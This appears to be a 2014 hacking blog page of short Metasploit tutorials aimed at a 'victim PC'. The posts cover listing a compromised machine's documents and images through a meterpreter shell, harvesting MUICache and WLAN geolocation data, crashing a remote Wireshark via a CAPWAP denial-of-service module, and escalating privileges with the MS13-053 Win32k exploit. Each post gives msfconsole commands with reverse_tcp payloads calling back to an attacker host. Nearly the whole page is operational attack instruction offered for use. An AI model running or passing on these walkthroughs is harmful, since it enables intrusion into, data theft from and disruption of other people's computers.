How to Find ALL Excel, Office, PDF, and Images Files in Remote PC

at 1:05 PM Wednesday, June 11, 2014 0 comments
First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Once you got the meterpreter session use ‘shell ‘command to get command prompt of the target

Find ALL MS Excel Files

This command will search through all subdirectories below for a file that matches that file name

Type dir *.xls /s


Find ALL MS office Files

This command will search through all subdirectories below for a file that matches that file name

Type dir *.doc /s


This command will search through all subdirectories below for a file that matches that file name

Type dir *.exe /s


 This command will search through all subdirectories below for a file that matches that file name

Type dir *.jpg /s


This command will search through all subdirectories below for a file that matches that file name

Type dir *.pdf /s

Labels: ,

How to Gather MUICache Entries in Remote Windows PC

at 2:36 AM Tuesday, June 10, 2014 0 comments
According to Nirsoft.net, “each time that you start using a new application, Windows operating system automatically extract the application name from the version resource of the exe file, and stores it for using it later, in Registry key known as the ‘MuiCache’.”

This module gathers information about the files and file paths that logged on users have executed on the system. It also will check if the file still exists on the system. This information is gathered by using information stored under the MUICache registry key. If the user is logged in when the module is executed it will collect the MUICache entries by accessing the registry directly. If the user is not logged in the module will download users registry hive NTUSER.DAT/UsrClass.dat from the system and the MUICache contents are parsed from the downloaded hive.

Exploit Targets
Windows 7

Requirement
Attacker: kali Linux
Victim PC: Windows 7

Open Kali terminal type msfconsole


Now type use post/windows/gather/enum_muicache
msf exploit (enum_muicache)>set payload windows/meterpreter/reverse_tcp
msf exploit (enum_muicache)>set lhost 192.168.1.3 (IP of Local Host)
msf exploit (enum_muicache)>set session 2
msf exploit (enum_muicache)>exploit




Result will stored on your local computer

/root/.msf4/loot/

Labels: ,

How to Crash Running Wireshark of Remote PC using CAPWAP Dissector DoS

at 2:55 AM Wednesday, June 4, 2014 0 comments
This module injects a malformed UDP packet to crash Wireshark and TShark 1.8.0 to 1.8.7, as well as 1.6.0 to 1.6.15. The vulnerability exists in the CAPWAP dissector which fails to handle a packet correctly when an incorrect length is given.

Exploit Targets
Wireshark 1.8.0

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open Kali terminal type msfconsole


Now type use auxiliary/dos/wireshark/capwap
msf exploit (capwap)>set rhost 192.168.1.11 (IP of Remote PC)
msf exploit (capwap)>set rport 5247
msf exploit (capwap)>exploit  



Labels: ,

Gather WLAN Information and Geolocation of Remote Windows, Linux or MAC PC

at 9:01 AM Sunday, May 11, 2014 0 comments
Enumerate wireless networks visible to the target device. Optionally geolocate the target by gathering local wireless networks and performing a lookup against Google APIs.

Exploit Targets
Windows 7
Linux
OSX

Requirement
Attacker: kali Linux
Victim PC: Windows 7

Open Kali terminal type msfconsole


Now type use post/multi/gather/wlan_geolocate
msf exploit (wlan_geolocate)>set payload windows/meterpreter/reverse_tcp
msf exploit (wlan_geolocate)>set lhost 192.168.1.7 (IP of Local Host)
msf exploit (wlan_geolocate)>set session 1
msf exploit (wlan_geolocate)>exploit


Now Wireless List will stored on your local computer
/root/.msf4/loot/


Labels: ,

Hack Remote Windows PC using Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)

at 5:09 AM Friday, May 9, 2014 0 comments
This module leverages a kernel pool overflow in Win32k which allows local privilege escalation. The kernel shellcode nulls the ACL for the winlogon.exe process (a SYSTEM process). This allows any unprivileged process to freely migrate to winlogon.exe, achieving privilege escalation. This exploit was used in pwn2own 2013 by MWR to break out of chrome's sandbox. NOTE: when a meterpreter session started by this exploit exits, winlogin.exe is likely to crash.

Exploit Targets
Windows 7

Requirement
Attacker: kali Linux
Victim PC: Windows 7

Open Kali terminal type msfconsole


Now type use exploit/windows/local/ms13_053_schlamperei
msf exploit (ms13_053_schlamperei)>set payload windows/meterpreter/reverse_tcp
msf exploit (ms13_053_schlamperei)>set lhost 192.168.1.7 (IP of Local Host)
msf exploit (ms13_053_schlamperei)>set session 2
msf exploit (ms13_053_schlamperei)>exploit

Labels: ,
Subscribe to: Posts (Atom)